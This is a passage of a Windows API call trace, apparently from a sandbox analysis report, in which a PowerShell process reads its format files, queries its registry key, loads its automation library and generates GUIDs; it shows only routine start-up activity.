	[0663.225] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.225] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.225] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.226] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.226] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.226] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.226] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.227] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.227] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.227] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.776] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.776] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.776] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.781] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.781] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.781] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.782] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.782] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.782] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.783] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.783] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.783] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.784] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.784] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.784] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.785] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.785] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.785] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.786] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.786] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.786] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.786] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.787] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.787] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.787] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.788] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.788] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.788] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.789] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.789] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.789] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.790] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.790] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0664.790] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0xf37, lpOverlapped=0x0) returned 1
	[0664.790] ReadFile (in: hFile=0x324, lpBuffer=0x3399487, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399487*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0664.791] ReadFile (in: hFile=0x324, lpBuffer=0x3399de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3399de8*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0664.791] CloseHandle (hObject=0x324) returned 1
	[0664.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0664.791] SetErrorMode (uMode=0x1) returned 0x1
	[0664.791] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d380 | out: lpFileInformation=0x12d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0664.791] SetErrorMode (uMode=0x1) returned 0x1
	[0664.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0664.792] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d468 | out: phkResult=0x12d468*=0x324) returned 0x0
	[0664.792] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3ec, lpData=0x0, lpcbData=0x12d3e8*=0x0 | out: lpType=0x12d3ec*=0x1, lpData=0x0, lpcbData=0x12d3e8*=0x56) returned 0x0
	[0664.792] CoTaskMemAlloc (cb=0x5a) returned 0x3188f0
	[0664.792] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3bc, lpData=0x3188f0, lpcbData=0x12d3b8*=0x56 | out: lpType=0x12d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d3b8*=0x56) returned 0x0
	[0664.792] CoTaskMemFree (pv=0x3188f0) 
	[0664.792] RegCloseKey (hKey=0x324) returned 0x0
	[0664.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0664.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0664.807] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xc91d428e, Data2=0xc417, Data3=0x4239, Data4=([0]=0xbf, [1]=0x96, [2]=0xf, [3]=0xbf, [4]=0x74, [5]=0xf8, [6]=0x1, [7]=0x3))) returned 0x0
	[0664.808] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xfba5ab42, Data2=0xab91, Data3=0x4595, Data4=([0]=0xbb, [1]=0xa1, [2]=0x6a, [3]=0xc1, [4]=0x5a, [5]=0xfd, [6]=0xde, [7]=0xac))) returned 0x0
	[0664.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0664.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0664.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0664.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0666.666] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xbc4efd5d, Data2=0xbdd1, Data3=0x43e4, Data4=([0]=0xb9, [1]=0xdb, [2]=0xff, [3]=0x88, [4]=0x98, [5]=0xee, [6]=0xe3, [7]=0x70))) returned 0x0
	[0666.667] VirtualQuery (in: lpAddress=0x12b6a0, lpBuffer=0x12c560, dwLength=0x30 | out: lpBuffer=0x12c560*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0666.668] VirtualQuery (in: lpAddress=0x12b730, lpBuffer=0x12c5f0, dwLength=0x30 | out: lpBuffer=0x12c5f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0668.251] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x1406011b, Data2=0x1766, Data3=0x4eb7, Data4=([0]=0xab, [1]=0xd2, [2]=0x43, [3]=0xca, [4]=0x80, [5]=0x3, [6]=0x1c, [7]=0xd5))) returned 0x0
	[0668.255] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x4fe4c6de, Data2=0xe550, Data3=0x4f11, Data4=([0]=0xae, [1]=0xb6, [2]=0xd7, [3]=0x16, [4]=0x7e, [5]=0xc2, [6]=0x2f, [7]=0x79))) returned 0x0
	[0668.255] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x1c41dad0, Data2=0x8617, Data3=0x484f, Data4=([0]=0xb9, [1]=0x33, [2]=0x3e, [3]=0xe4, [4]=0x52, [5]=0xfd, [6]=0x2e, [7]=0xa2))) returned 0x0
	[0668.283] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x3b571c21, Data2=0x1f4, Data3=0x486a, Data4=([0]=0xb8, [1]=0xdb, [2]=0xc9, [3]=0xd4, [4]=0x8f, [5]=0xb3, [6]=0x2c, [7]=0x83))) returned 0x0
	[0668.284] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xb404a401, Data2=0x5e28, Data3=0x4554, Data4=([0]=0xb5, [1]=0xe2, [2]=0xd4, [3]=0x8c, [4]=0xa1, [5]=0x35, [6]=0xa4, [7]=0x74))) returned 0x0
	[0668.284] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x950381f, Data2=0x1e16, Data3=0x47f3, Data4=([0]=0x9b, [1]=0x54, [2]=0xea, [3]=0xe8, [4]=0x5e, [5]=0x66, [6]=0x30, [7]=0xe6))) returned 0x0
	[0668.284] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x661ae39, Data2=0x2168, Data3=0x4bb1, Data4=([0]=0x9d, [1]=0x37, [2]=0xc6, [3]=0x1c, [4]=0xe6, [5]=0x28, [6]=0xc7, [7]=0x39))) returned 0x0
	[0668.284] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x21ce4bb, Data2=0xa27d, Data3=0x435f, Data4=([0]=0xbe, [1]=0xc8, [2]=0x97, [3]=0xc3, [4]=0xaa, [5]=0x19, [6]=0x58, [7]=0xcf))) returned 0x0
	[0668.285] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xb83e79a3, Data2=0xd9c5, Data3=0x4f82, Data4=([0]=0x90, [1]=0xb6, [2]=0x4e, [3]=0xe9, [4]=0x4a, [5]=0xf2, [6]=0xd6, [7]=0x5c))) returned 0x0
	[0668.285] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x3c7879f8, Data2=0x8408, Data3=0x4a04, Data4=([0]=0xb5, [1]=0x13, [2]=0x36, [3]=0x4, [4]=0xfc, [5]=0xbd, [6]=0x8a, [7]=0xca))) returned 0x0
	[0668.285] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x4e853ab, Data2=0xf26a, Data3=0x4a01, Data4=([0]=0x87, [1]=0x8, [2]=0xe9, [3]=0xa2, [4]=0x9d, [5]=0xc, [6]=0x14, [7]=0x53))) returned 0x0
	[0668.285] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xbbd6412d, Data2=0xe22b, Data3=0x4302, Data4=([0]=0x9b, [1]=0xf5, [2]=0x8a, [3]=0x5d, [4]=0x9e, [5]=0xc3, [6]=0xdf, [7]=0x8a))) returned 0x0
	[0668.287] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xdf7942e4, Data2=0xef02, Data3=0x4b42, Data4=([0]=0x95, [1]=0xad, [2]=0x4d, [3]=0xe5, [4]=0x80, [5]=0x2f, [6]=0x20, [7]=0x11))) returned 0x0
	[0668.288] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xab2445db, Data2=0xa43d, Data3=0x4c17, Data4=([0]=0xb7, [1]=0xce, [2]=0x70, [3]=0xa, [4]=0xed, [5]=0x14, [6]=0x74, [7]=0x5d))) returned 0x0
	[0668.289] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xe4854280, Data2=0x7e1, Data3=0x4d1a, Data4=([0]=0xb0, [1]=0xa, [2]=0xa4, [3]=0xb4, [4]=0x66, [5]=0xf4, [6]=0x6a, [7]=0xc7))) returned 0x0
	[0668.289] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xcbb8dddb, Data2=0xee91, Data3=0x4365, Data4=([0]=0xbf, [1]=0x39, [2]=0x80, [3]=0x3f, [4]=0x14, [5]=0xb1, [6]=0x44, [7]=0x81))) returned 0x0
	[0668.289] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xdbc43216, Data2=0x81e4, Data3=0x4b46, Data4=([0]=0xae, [1]=0x28, [2]=0xb6, [3]=0x2c, [4]=0x99, [5]=0x8c, [6]=0xb6, [7]=0x80))) returned 0x0
	[0668.289] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x981ced80, Data2=0x8717, Data3=0x4de9, Data4=([0]=0xac, [1]=0xcb, [2]=0x57, [3]=0xea, [4]=0x81, [5]=0x7, [6]=0x88, [7]=0x30))) returned 0x0
	[0668.290] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xb6bd94db, Data2=0x3326, Data3=0x4d69, Data4=([0]=0xb4, [1]=0xc3, [2]=0xca, [3]=0xcc, [4]=0x36, [5]=0xf0, [6]=0xbc, [7]=0xb8))) returned 0x0
	[0668.290] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xe04c50e, Data2=0x17a3, Data3=0x4ab9, Data4=([0]=0xad, [1]=0x10, [2]=0xd2, [3]=0xf6, [4]=0x26, [5]=0x5, [6]=0x60, [7]=0x40))) returned 0x0
	[0668.290] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x8038eeb7, Data2=0xaa67, Data3=0x407d, Data4=([0]=0xb0, [1]=0xc3, [2]=0x74, [3]=0xae, [4]=0x30, [5]=0x5c, [6]=0x3, [7]=0x2d))) returned 0x0
	[0668.290] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x76252f64, Data2=0x19f2, Data3=0x4e9b, Data4=([0]=0xa7, [1]=0x8d, [2]=0xd1, [3]=0xfb, [4]=0x20, [5]=0xb, [6]=0x9b, [7]=0xca))) returned 0x0
	[0668.291] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0668.291] GetFileType (hFile=0x324) returned 0x1
	[0668.291] SetErrorMode (uMode=0x1) returned 0x1
	[0668.291] GetFileType (hFile=0x324) returned 0x1
	[0668.291] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.121] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.121] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.122] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.122] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.123] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0670.124] ReadFile (in: hFile=0x324, lpBuffer=0x3475530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x3475530*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
